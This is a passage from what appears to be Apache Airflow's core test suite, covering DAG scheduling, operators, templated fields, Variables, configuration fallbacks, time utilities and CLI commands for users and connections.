dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEquals(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEquals(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'create_user', '-u', 'test3', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@example.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
args = self.parser.parse_args([
'delete_user', '-u', 'test3',
])
cli.delete_user(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'create_user', '-u', 'user{}'.format(i), '-l', 'doe', '-f', 'jon',
'-e', 'jdoe+{}@gmail.com'.format(i), '-r', 'Viewer',
'--use_random_password'
])
cli.create_user(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.list_users(self.parser.parse_args(['list_users']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
# test whether sync_perm cli will throw exceptions or not
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
